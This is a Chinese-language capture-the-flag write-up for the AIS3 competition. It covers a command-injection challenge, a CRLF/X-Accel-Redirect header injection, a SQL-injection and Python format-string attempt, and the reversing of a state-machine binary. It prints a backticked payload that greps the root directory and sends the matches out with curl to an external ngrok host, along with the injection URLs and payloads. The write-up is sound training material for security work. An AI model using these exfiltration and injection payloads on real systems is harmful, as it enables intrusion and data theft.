web
nslookup final
有command injection,用``把指令包起來,但是會有一個問題就是他不會回傳結果,
curl webhook.trianglesnake.com/?text=123呼叫聊天機器人webhook試試看,有收到訊息,所以直接把flag偷出來
因為有WAF限制flag、*,但我知道flag的prefix了,所以直接遍歷根目錄檔案找出flag
`curl -G https://eec1-182-234-154-17.ngrok-free.app/ --data-urlencode
"$(find / -maxdepth 1 -type f -exec grep 'ais3' {} +)"`AIS3{jUST_3a$y_cOMmaND_INj3c7I0N}
internal
沒辦法碰到/flag但是如果由內網機器送redirect請求並包含X-Accel-Redirectheader就可以穿透。
這題在考crlf截斷,截斷之後可以header injection
http://10.105.0.21:11580/?redir=https://www.google.com%0d%0aX-Accel-Redirect:%20/flagAIS3{JUsT_s0m3_FUnNy_N91NX_FEaturE}
copypasta
題目有sql injection,用sqlmap dump出所有column後可以直接存取/posts/flag_id,但他會檢查cookie,所以絲路變成:透過sql injection創建不存在的貼文->透過string format撈出app.secret_key->偽造cookie->存取flag頁面
透過sql injection創造貼文
#source code
tmpl = db().cursor().execute(
f"SELECT * FROM copypasta_template WHERE id = {id}"
).fetchone()這裡很明顯留了一個洞給我們
#payload
?id=1,'a','{field.__class__....}'此時下面進行format string的時候就會被injection
res = content.format(field=request.form)這題沒有做出來,卡在Pyton format string漏洞,可以摸到magic method,但是因為在不同namespace沒辦法用__global__撈到app.secret_key
reverse
stateful
把整個流程反過來做一次 真reversed engineering
先用ghidra把C弄出來後用vs code 的取代把每個function改成printf,之後用python把出來的function整個反過來
string = """
3618225054(k_target)
2057902921(k_target)
671274660(k_target)
...
...
557589375(k_target)
3420754995(k_target)
3648003850(k_target)
1978986903(k_target)
"""
lst = string.split('\n')
lst.reverse()
print(lst)
for i in lst:
print('state_'+i+';')把每個狀態機的function+改成-,然後把k_target逆向回推
// Hello world! Cplayground is an online sandbox that makes it easy to try out
// code.
int main() {
int local_14 = 1;
int local_10 = 0;
unsigned local_c = 0xd7a9bb9e;
bool bVar1 = false;
char k_target[43] =
{
38,
75,
...
128,
101,
-20,
125
};
state_1978986903(k_target);
state_3648003850(k_target);
state_3420754995(k_target);
state_557589375(k_target);
...
state_2057902921(k_target);
state_3618225054(k_target);
for (int i=0;i<44;i++){
printf("%c",k_target[i]);
}
return 0;
}基本上就是反著做一遍
AIS3{Ar3_y0U_@_sTAtEfuL_Or_S7AT3L3SS_ctfer}